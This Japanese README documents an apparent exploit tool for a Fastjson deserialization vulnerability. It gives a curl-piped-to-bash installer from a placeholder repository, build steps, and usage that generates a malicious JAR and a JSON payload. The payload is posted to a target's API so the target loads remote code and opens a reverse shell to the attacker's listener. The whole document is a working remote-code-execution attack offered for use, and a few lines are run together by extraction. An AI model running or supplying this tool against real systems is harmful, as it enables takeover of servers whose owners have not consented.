
Fastjson バージョン 1.2.68 – 1.2.83 に影響する重大な脆弱性。
Linux(または Windows 上の WSL)
C++17 対応コンパイラ(GCC 7+ または Clang 5+)
CMake 3.10 以降
システムパッケージ:
libzip-devzlib1g-devsudo apt update
sudo apt install -y build-essential cmake libzip-dev zlib1g-dev
次の1コマンドですべてをインストールします:
curl -sSL https://raw.githubusercontent.com/yourusername/CVE-2026-16723/main/install.sh | bash
または手動でインストーラをダウンロードして実行します:
wget https://raw.githubusercontent.com/yourusername/CVE-2026-16723/main/install.sh
chmod +x install.sh
./install.sh
インストールスクリプトは次のことを行います:
必要なシステムパッケージをすべてインストールします。
必要なヘッダオンリーライブラリをダウンロードします:
nlohmann/jsoncpp-httplibプロジェクトをビルドします。
コンパイルされたバイナリをカレントディレクトリに次の名前で配置します:
./exploit
リポジトリをクローンした場合:
git clone https://github.com/yourusername/CVE-2026-16723.git
cd CVE-2026-16723
./install.sh
または手動でビルドします:
mkdir build
cd build
cmake ..
make -j$(nproc)
cp exploit ../
バイナリを実行します:
./exploit --lhost <YOUR_IP> --lport <SHELL_PORT> [options]
./exploit --lhost 192.168.1.100 --lport 4444 --http-port 8000
実行後、次のファイルが作成されます:
x
body.json
HTTPサーバーは設定されたポート(デフォルト: 8000)で起動し、ツールはリバースシェル接続が来るのを待機します。
生成された body.json ファイルを脆弱なエンドポイントに送信します:
curl -X POST http://<TARGET_IP>:8080/api/products/search \
-H "Content-Type: application/json" \
--data-binary @body.json
アプリケーションが別のJSONフィールドを期待する場合は、--field オプションで指定してください。
| File | Description |
|---|---|
x | 生成されたJARペイロード |
body.json | ターゲットに送信するJSONペイロード |
jar:http および jar:file プロトコルを使用してリモートJARをダウンロードおよびロードさせます。| Option | Description | Default |
|---|
--lhost | ローカルIPアドレス | 必須 |
--lport | リバースシェル待受ポート | 4444 |
--http-port | HTTPサーバーポート | 8000 |
--first | 試行する最初のファイルディスクリプタ | 3 |
--last | 試行する最後のファイルディスクリプタ | 30 |
--field | JSONフィールド名 | facets |
--outdir | 出力ディレクトリ | . |
-h, --help | ヘルプメッセージを表示 | — |